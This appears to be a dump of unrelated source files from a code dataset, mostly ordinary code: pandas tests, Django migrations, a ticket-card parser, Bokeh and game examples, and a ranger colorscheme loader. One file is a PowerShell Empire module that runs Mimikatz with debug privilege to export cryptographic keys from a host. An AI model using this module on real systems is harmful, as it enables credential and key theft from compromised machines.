key = f"datetime64[ns, {tz}]"
rep[key] = [
pd.Timestamp("2011-01-01", tz=tz),
pd.Timestamp("2011-01-03", tz=tz),
]
rep["timedelta64[ns]"] = [pd.Timedelta("1 day"), pd.Timedelta("2 day")]
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64[ns]",
"datetime64[ns, UTC]",
"datetime64[ns, US/Eastern]",
"timedelta64[ns]",
],
ids=[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64",
"datetime64tz",
"datetime64tz",
"timedelta64",
],
)
@pytest.mark.parametrize(
"from_key",
[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64[ns]",
"datetime64[ns, UTC]",
"datetime64[ns, US/Eastern]",
"timedelta64[ns]",
],
)
def test_replace_series(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xxx")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if from_key.startswith("datetime") and to_key.startswith("datetime"):
# tested below
return
elif from_key in ["datetime64[ns, US/Eastern]", "datetime64[ns, UTC]"]:
# tested below
return
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
if (from_key == "float64" and to_key in ("int64")) or (
from_key == "complex128" and to_key in ("int64", "float64")
):
if not IS64 or is_platform_windows():
pytest.skip(f"32-bit platform buggy: {from_key} -> {to_key}")
# Expected: do not downcast by replacement
exp = pd.Series(self.rep[to_key], index=index, name="yyy", dtype=from_key)
else:
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
["timedelta64[ns]", "bool", "object", "complex128", "float64", "int64"],
)
@pytest.mark.parametrize(
"from_key", ["datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"]
)
def test_replace_series_datetime_tz(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xyz")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
["datetime64[ns]", "datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"],
)
@pytest.mark.parametrize(
"from_key",
["datetime64[ns]", "datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"],
)
def test_replace_series_datetime_datetime(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xyz")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
@pytest.mark.xfail(reason="Test not implemented")
def test_replace_series_period(self):
raise NotImplementedError
| bsd-3-clause | -3,278,554,693,821,692,400 | 33.700087 | 88 | 0.547072 | false |
AlertaDengue/AlertaDengue | AlertaDengue/forecast/migrations/0001_initial.py | 1 | 1221 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-27 00:23
from __future__ import unicode_literals
from django.db import migrations
import sys
def create_dengue_global():
if 'test' in sys.argv:
sql = '''
CREATE SCHEMA IF NOT EXISTS "Dengue_global";
CREATE TABLE IF NOT EXISTS "Dengue_global"."Municipio"
(
geocodigo integer NOT NULL,
nome character varying(128) NOT NULL,
geojson text NOT NULL,
populacao bigint NOT NULL,
uf character varying(20) NOT NULL,
CONSTRAINT "Municipio_pk" PRIMARY KEY (geocodigo)
);
CREATE TABLE IF NOT EXISTS "Dengue_global"."CID10"
(
nome character varying(512) NOT NULL,
codigo character varying(5) NOT NULL,
CONSTRAINT "CID10_pk" PRIMARY KEY (codigo)
);
'''
else:
sql = 'SELECT 1;'
return migrations.RunSQL(sql, hints={'target_db': 'forecast'})
class Migration(migrations.Migration):
operations = [
migrations.SeparateDatabaseAndState(
database_operations=[create_dengue_global()]
)
]
| gpl-3.0 | -4,531,334,576,695,109,000 | 27.395349 | 66 | 0.569206 | false |
12019/cyberflex-shell | cards/vrs_application.py | 2 | 4438 | from generic_application import Application
import struct, binascii, os, datetime, sys, time
from iso_7816_4_card import ISO_7816_4_Card
import utils, TLV_utils, generic_card
class VRS_Application(Application):
DRIVER_NAME = ["VRS"]
AID_LIST = [
"d2760000254b414e4d303100",
"d2760001354b414e4d303100",
]
class VrsTicket(object):
def __init__(self):
self._birthdate = None
self._maindata = []
self._mainblob = None
self._rawdata = None
self._tlvdata = None
self._card = None
def from_card(cls, card, record_no = 1):
if not isinstance(card, VRS_Application):
if not isinstance(card, ISO_7816_4_Card):
raise ValueError, "card must be a VRS_Application object or a ISO_7816_4_Card object, not %s" % type(card)
else:
result = card.select_application(binascii.a2b_hex(VRS_Application.AID_LIST[0]))
if not card.check_sw(result.sw):
raise EnvironmentError, "card did not accept SELECT APPLICATION, sw was %02x %02x" % (result.sw1, result.sw2)
assert isinstance(card, VRS_Application)
c = cls()
c._card = card
result = card.open_file("\x0c\x05")
if card.check_sw(result.sw):
contents = card.read_record(record_no, 4)
if len(contents) > 0:
c._parse( contents )
else:
raise KeyError, "No ticket in record no. %i" % record_no
else:
raise EnvironmentError, "card did not accept SELECT FILE, sw was %02x %02x" % (result.sw1, result.sw2)
return c
def _parse(self, contents):
self._rawdata = contents
self._tlvdata = TLV_utils.unpack(contents)
tmp = TLV_utils.tlv_find_tag(self._tlvdata, 0xEA, num_results = 1)
if len(tmp) == 0:
raise ValueError, "Can't parse information file, tag 0xEA not found"
tmp = TLV_utils.tlv_find_tag(tmp, 0x85, num_results = 1)
if len(tmp) == 0:
raise ValueError, "Can't parse information file, tag 0x85 not found"
self._mainblob = tmp[0][2]
tmp = self._mainblob
some_id, tmp = tmp[:4], tmp[4:]
ascii_field_len = ord(tmp[0])
tmp = tmp[1:]
ascii_field, tmp = tmp[:ascii_field_len], tmp[ascii_field_len:]
self._maindata = ascii_field.split(" ")
if len(tmp) > 0:
if tmp[0] == "\x01":
tmp = tmp[1:]
birthdate_bin, tmp = tmp[:4], tmp[4:]
birthdate = binascii.b2a_hex(birthdate_bin)
self._birthdate = datetime.date( int(birthdate[0:4]), int(birthdate[4:6]), int(birthdate[6:8]) )
if len(tmp) > 0:
print "Warning: unparsed data trailing: %r" % tmp
from_card = classmethod(from_card)
def getter(index, encoding=None):
def g(self):
if self._maindata is None or len(self._maindata) <= index:
return None
if encoding is None:
return unicode( self._maindata[index] )
else:
return unicode( self._maindata[index], encoding = encoding )
return g
def _get_alter(self):
now = datetime.date.fromtimestamp( time.time() )
diff = now.year-self.geburtsdatum.year
thisyearsbirthday = datetime.date( now.year, self.geburtsdatum.month, self.geburtsdatum.day )
if now < thisyearsbirthday: diff = diff - 1
return diff
def __str__(self):
return "%s: %s %s" % (self.tickettyp, self.name_klar, self.abonr)
tickettyp = property(getter(0))
rnummer = property(getter(1))
gueltigkeit = property(getter(2))
feld4 = property(getter(3))
name_raw = property(getter(4))
vorname = property(lambda self: self.name_raw and "".join(self.name_raw.split(",_")[1:]).replace("_", " "))
nachname = property(lambda self: self.name_raw and "".join(self.name_raw.split(",_")[:1]).replace("_", " "))
name_klar = property(lambda self: self.vorname + " " + self.nachname)
schule = abonr = property(getter(5,'cp850'))
geburtsdatum = property(lambda self: self._birthdate)
alter = property(lambda self: self._birthdate and self._get_alter())
| gpl-2.0 | 177,444,868,787,737,900 | 36.931624 | 129 | 0.563317 | false |
xpansa/purchase-workflow | purchase_delivery_address/__openerp__.py | 9 | 1328 | # -*- coding: utf-8 -*-
# Author: Leonardo Pistone
# Copyright 2014 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
{'name': 'Purchase Delivery Address [DEPRECATED]',
'summary': 'Deprecated: install purchase_transport_multi_address and '
'stock_transport_multi_address instead',
'version': '8.0.1.1.0',
'author': "Camptocamp,Odoo Community Association (OCA)",
'category': 'Purchase Management',
'license': 'AGPL-3',
'complexity': 'easy',
'images': [],
'depends': ['purchase_transport_multi_address',
'stock_transport_multi_address'
],
'demo': [],
'data': [],
'auto_install': False,
'test': [],
'installable': True,
}
| agpl-3.0 | -6,373,660,281,539,396,000 | 38.058824 | 77 | 0.680723 | false |
GunnerJnr/_CodeInstitute | Stream-3/Full-Stack-Development/10.Custom-User-And-Email-Authentication/3.Changing-Authentication/auth_demo/accounts/models.py | 3 | 1377 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.auth.models import AbstractUser, UserManager
from django.db import models
from django.utils import timezone
# Create your models here.
# Create our new user class
class AccountUserManager(UserManager):
def _create_user(self, username, email, password, is_staff, is_supervisor, **extra_fields):
"""
Creates and saves a User with the given username, email and password.
:param username:
:param email:
:param password:
:param is_staff:
:param is_supervisor:
:param extra_fields:
:return:
"""
now = timezone.now()
if not email:
raise ValueError('The given username must be set')
email = self.normalize_email(email)
user = self.model(username=email, email=email,
is_staff=is_staff, is_active=True,
is_supervisor=is_supervisor,
date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self.db)
return user
class User(AbstractUser):
# now that we've abstracted this class we can add any
# number of custom attribute to our user class
# in later units we'll be adding things like payment details!
objects = AccountUserManager()
| mit | 3,389,450,783,465,902,000 | 31.785714 | 95 | 0.625999 | false |
schoolie/bokeh | examples/app/export_csv/main.py | 4 | 1399 | from os.path import dirname, join
import pandas as pd
from bokeh.layouts import row, widgetbox
from bokeh.models import ColumnDataSource, CustomJS
from bokeh.models.widgets import Slider, Button, DataTable, TableColumn, NumberFormatter
from bokeh.io import curdoc
df = pd.read_csv(join(dirname(__file__), 'salary_data.csv'))
source = ColumnDataSource(data=dict())
def update():
current = df[df['salary'] <= slider.value].dropna()
source.data = {
'name' : current.name,
'salary' : current.salary,
'years_experience' : current.years_experience,
}
slider = Slider(title="Max Salary", start=10000, end=250000, value=150000, step=1000)
slider.on_change('value', lambda attr, old, new: update())
button = Button(label="Download", button_type="success")
button.callback = CustomJS(args=dict(source=source),
code=open(join(dirname(__file__), "download.js")).read())
columns = [
TableColumn(field="name", title="Employee Name"),
TableColumn(field="salary", title="Income", formatter=NumberFormatter(format="$0,0.00")),
TableColumn(field="years_experience", title="Experience (years)")
]
data_table = DataTable(source=source, columns=columns, width=800)
controls = widgetbox(slider, button)
table = widgetbox(data_table)
curdoc().add_root(row(controls, table))
curdoc().title = "Export CSV"
update()
| bsd-3-clause | -1,741,369,890,174,470,000 | 31.534884 | 93 | 0.686204 | false |
jgome043/cs170-group-project | src/pacmanAgents.py | 1 | 2118 | # pacmanAgents.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# ([email protected]) and Dan Klein ([email protected]).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel ([email protected]).
import random
import game
import util
from game import Agent
from pacman import Directions
class LeftTurnAgent(game.Agent):
"An agent that turns left at every opportunity"
def getAction(self, state):
legal = state.getLegalPacmanActions()
current = state.getPacmanState().configuration.direction
if current == Directions.STOP: current = Directions.NORTH
left = Directions.LEFT[current]
if left in legal: return left
if current in legal: return current
if Directions.RIGHT[current] in legal: return Directions.RIGHT[current]
if Directions.LEFT[left] in legal: return Directions.LEFT[left]
return Directions.STOP
class GreedyAgent(Agent):
def __init__(self, evalFn="scoreEvaluation"):
self.evaluationFunction = util.lookup(evalFn, globals())
assert self.evaluationFunction != None
def getAction(self, state):
# Generate candidate actions
legal = state.getLegalPacmanActions()
if Directions.STOP in legal: legal.remove(Directions.STOP)
successors = [(state.generateSuccessor(0, action), action) for action in legal]
scored = [(self.evaluationFunction(state), action) for state, action in successors]
bestScore = max(scored)[0]
bestActions = [pair[1] for pair in scored if pair[0] == bestScore]
return random.choice(bestActions)
def scoreEvaluation(state):
return state.getScore()
| gpl-3.0 | 3,113,021,930,913,981,000 | 38.222222 | 91 | 0.711048 | false |
ZmG/openwhisk-tutorial | whisk_tutorial/migrations/0005_auto__chg_field_tutorialuser_http_user_agent__chg_field_tutorialuser_h.py | 2 | 6251 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'TutorialUser.http_user_agent'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_user_agent', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_real_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_real_remote_address', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_remote_address', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_accept_language'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_accept_language', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_referrer'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_referrer', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.session_key'
db.alter_column(u'whisk_tutorial_tutorialuser', 'session_key', self.gf('django.db.models.fields.CharField')(unique=True, max_length=40))
# Adding unique constraint on 'TutorialUser', fields ['session_key']
db.create_unique(u'whisk_tutorial_tutorialuser', ['session_key'])
def backwards(self, orm):
# Removing unique constraint on 'TutorialUser', fields ['session_key']
db.delete_unique(u'whisk_tutorial_tutorialuser', ['session_key'])
# Changing field 'TutorialUser.http_user_agent'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_user_agent', self.gf('django.db.models.fields.CharField')(max_length=256))
# Changing field 'TutorialUser.http_real_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_real_remote_address', self.gf('django.db.models.fields.CharField')(max_length=32))
# Changing field 'TutorialUser.http_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_remote_address', self.gf('django.db.models.fields.CharField')(max_length=32))
# Changing field 'TutorialUser.http_accept_language'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_accept_language', self.gf('django.db.models.fields.CharField')(max_length=128))
# Changing field 'TutorialUser.http_referrer'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_referrer', self.gf('django.db.models.fields.CharField')(max_length=128))
# Changing field 'TutorialUser.session_key'
db.alter_column(u'whisk_tutorial_tutorialuser', 'session_key', self.gf('django.db.models.fields.CharField')(max_length=80))
models = {
u'whisk_tutorial.whiskfileevent': {
'Meta': {'object_name': 'DockerfileEvent'},
'errors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'level': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.subscriber': {
'Meta': {'unique_together': "(('email', 'from_level'),)", 'object_name': 'Subscriber'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '80'}),
'from_level': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.tutorialevent': {
'Meta': {'object_name': 'TutorialEvent'},
'command': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '80', 'blank': 'True'}),
'feedback': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2000', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.tutorialuser': {
'Meta': {'object_name': 'TutorialUser'},
'http_accept_language': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_real_remote_address': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_referrer': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_remote_address': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_user_agent': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '80', 'blank': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['whisk_tutorial'] | apache-2.0 | -8,953,336,706,515,800,000 | 62.795918 | 145 | 0.616541 | false |
FabianHahn/libstore | thirdparty/googletest/googletest/test/gtest_xml_outfiles_test.py | 11 | 5593 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for the gtest_xml_output module."""
import os
from xml.dom import minidom, Node
import gtest_test_utils
import gtest_xml_test_utils
GTEST_OUTPUT_SUBDIR = "xml_outfiles"
GTEST_OUTPUT_1_TEST = "gtest_xml_outfile1_test_"
GTEST_OUTPUT_2_TEST = "gtest_xml_outfile2_test_"
EXPECTED_XML_1 = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="1" failures="0" disabled="0" errors="0" time="*" timestamp="*" name="AllTests">
<testsuite name="PropertyOne" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="TestSomeProperties" status="run" time="*" classname="PropertyOne">
<properties>
<property name="SetUpProp" value="1"/>
<property name="TestSomeProperty" value="1"/>
<property name="TearDownProp" value="1"/>
</properties>
</testcase>
</testsuite>
</testsuites>
"""
EXPECTED_XML_2 = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="1" failures="0" disabled="0" errors="0" time="*" timestamp="*" name="AllTests">
<testsuite name="PropertyTwo" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="TestSomeProperties" status="run" time="*" classname="PropertyTwo">
<properties>
<property name="SetUpProp" value="2"/>
<property name="TestSomeProperty" value="2"/>
<property name="TearDownProp" value="2"/>
</properties>
</testcase>
</testsuite>
</testsuites>
"""
class GTestXMLOutFilesTest(gtest_xml_test_utils.GTestXMLTestCase):
"""Unit test for Google Test's XML output functionality."""
def setUp(self):
# We want the trailing '/' that the last "" provides in os.path.join, for
# telling Google Test to create an output directory instead of a single file
# for xml output.
self.output_dir_ = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_OUTPUT_SUBDIR, "")
self.DeleteFilesAndDir()
def tearDown(self):
self.DeleteFilesAndDir()
def DeleteFilesAndDir(self):
try:
os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_1_TEST + ".xml"))
except os.error:
pass
try:
os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_2_TEST + ".xml"))
except os.error:
pass
try:
os.rmdir(self.output_dir_)
except os.error:
pass
def testOutfile1(self):
self._TestOutFile(GTEST_OUTPUT_1_TEST, EXPECTED_XML_1)
def testOutfile2(self):
self._TestOutFile(GTEST_OUTPUT_2_TEST, EXPECTED_XML_2)
def _TestOutFile(self, test_name, expected_xml):
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(test_name)
command = [gtest_prog_path, "--gtest_output=xml:%s" % self.output_dir_]
p = gtest_test_utils.Subprocess(command,
working_dir=gtest_test_utils.GetTempDir())
self.assert_(p.exited)
self.assertEquals(0, p.exit_code)
# TODO([email protected]): libtool causes the built test binary to be
# named lt-gtest_xml_outfiles_test_ instead of
# gtest_xml_outfiles_test_. To account for this possibility, we
# allow both names in the following code. We should remove this
# hack when Chandler Carruth's libtool replacement tool is ready.
output_file_name1 = test_name + ".xml"
output_file1 = os.path.join(self.output_dir_, output_file_name1)
output_file_name2 = 'lt-' + output_file_name1
output_file2 = os.path.join(self.output_dir_, output_file_name2)
self.assert_(os.path.isfile(output_file1) or os.path.isfile(output_file2),
output_file1)
expected = minidom.parseString(expected_xml)
if os.path.isfile(output_file1):
actual = minidom.parse(output_file1)
else:
actual = minidom.parse(output_file2)
self.NormalizeXml(actual.documentElement)
self.AssertEquivalentNodes(expected.documentElement,
actual.documentElement)
expected.unlink()
actual.unlink()
if __name__ == "__main__":
os.environ["GTEST_STACK_TRACE_DEPTH"] = "0"
gtest_test_utils.Main()
| mit | -5,622,139,924,132,227,000 | 38.95 | 98 | 0.690685 | false |
swalladge/ranger | ranger/gui/colorscheme.py | 5 | 5568 | # This file is part of ranger, the console file manager.
# License: GNU GPL version 3, see the file "AUTHORS" for details.
"""Colorschemes define colors for specific contexts.
Generally, this works by passing a set of keywords (strings) to
the colorscheme.get() method to receive the tuple (fg, bg, attr).
fg, bg are the foreground and background colors and attr is the attribute.
The values are specified in ranger.gui.color.
A colorscheme must...
1. be inside either of these directories:
~/.config/ranger/colorschemes/
path/to/ranger/colorschemes/
2. be a subclass of ranger.gui.colorscheme.ColorScheme
3. implement a use(self, context) method which returns (fg, bg, attr).
context is a struct which contains all entries of CONTEXT_KEYS,
associated with either True or False.
Define which colorscheme in your settings (e.g. ~/.config/ranger/rc.conf):
set colorscheme yourschemename
"""
from __future__ import (absolute_import, division, print_function)
import os.path
from curses import color_pair
import ranger
from ranger.gui.color import get_color
from ranger.gui.context import Context
from ranger.core.main import allow_access_to_confdir
from ranger.ext.cached_function import cached_function
from ranger.ext.iter_tools import flatten
class ColorSchemeError(Exception):
pass
class ColorScheme(object):
"""This is the class that colorschemes must inherit from.
it defines the get() method, which returns the color tuple
which fits to the given keys.
"""
@cached_function
def get(self, *keys):
"""Returns the (fg, bg, attr) for the given keys.
Using this function rather than use() will cache all
colors for faster access.
"""
context = Context(keys)
color = self.use(context)
if len(color) != 3 or not all(isinstance(value, int) for value in color):
raise ValueError("Bad Value from colorscheme. Need "
"a tuple of (foreground_color, background_color, attribute).")
return color
@cached_function
def get_attr(self, *keys):
"""Returns the curses attribute for the specified keys
Ready to use for curses.setattr()
"""
fg, bg, attr = self.get(*flatten(keys))
return attr | color_pair(get_color(fg, bg))
@staticmethod
def use(_):
"""Use the colorscheme to determine the (fg, bg, attr) tuple.
Override this method in your own colorscheme.
"""
return (-1, -1, 0)
def _colorscheme_name_to_class(signal): # pylint: disable=too-many-branches
# Find the colorscheme. First look in ~/.config/ranger/colorschemes,
# then at RANGERDIR/colorschemes. If the file contains a class
# named Scheme, it is used. Otherwise, an arbitrary other class
# is picked.
if isinstance(signal.value, ColorScheme):
return
if not signal.value:
signal.value = 'default'
scheme_name = signal.value
usecustom = not ranger.args.clean
def exists(colorscheme):
return os.path.exists(colorscheme + '.py') or os.path.exists(colorscheme + '.pyc')
def is_scheme(cls):
try:
return issubclass(cls, ColorScheme)
except TypeError:
return False
# create ~/.config/ranger/colorschemes/__init__.py if it doesn't exist
if usecustom:
if os.path.exists(signal.fm.confpath('colorschemes')):
initpy = signal.fm.confpath('colorschemes', '__init__.py')
if not os.path.exists(initpy):
open(initpy, 'a').close()
if usecustom and \
exists(signal.fm.confpath('colorschemes', scheme_name)):
scheme_supermodule = 'colorschemes'
elif exists(signal.fm.relpath('colorschemes', scheme_name)):
scheme_supermodule = 'ranger.colorschemes'
usecustom = False
else:
scheme_supermodule = None # found no matching file.
if scheme_supermodule is None:
if signal.previous and isinstance(signal.previous, ColorScheme):
signal.value = signal.previous
else:
signal.value = ColorScheme()
raise ColorSchemeError("Cannot locate colorscheme `%s'" % scheme_name)
else:
if usecustom:
allow_access_to_confdir(ranger.args.confdir, True)
scheme_module = getattr(
__import__(scheme_supermodule, globals(), locals(), [scheme_name], 0), scheme_name)
if usecustom:
allow_access_to_confdir(ranger.args.confdir, False)
if hasattr(scheme_module, 'Scheme') and is_scheme(scheme_module.Scheme):
signal.value = scheme_module.Scheme()
else:
for var in scheme_module.__dict__.values():
if var != ColorScheme and is_scheme(var):
signal.value = var()
break
else:
raise ColorSchemeError("The module contains no valid colorscheme!")
def get_all_colorschemes(fm):
colorschemes = set()
# Load colorscheme names from main ranger/colorschemes dir
for item in os.listdir(os.path.join(ranger.RANGERDIR, 'colorschemes')):
if not item.startswith('__'):
colorschemes.add(item.rsplit('.', 1)[0])
# Load colorscheme names from ~/.config/ranger/colorschemes if dir exists
confpath = fm.confpath('colorschemes')
if os.path.isdir(confpath):
for item in os.listdir(confpath):
if not item.startswith('__'):
colorschemes.add(item.rsplit('.', 1)[0])
return list(sorted(colorschemes))
| gpl-3.0 | -5,530,726,037,153,921,000 | 34.240506 | 95 | 0.65194 | false |
adaptivethreat/Empire | lib/modules/powershell/credentials/mimikatz/keys.py | 7 | 2569 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz DumpKeys',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to extract all keys to the local directory."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# add in the key dumping command
scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::keys /export"' """
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
| bsd-3-clause | -3,643,933,511,273,116,700 | 31.935897 | 118 | 0.543013 | false |
mmottahedi/neuralnilm_prototype | scripts/e311.py | 2 | 5625 | from __future__ import print_function, division
import matplotlib
import logging
from sys import stdout
matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
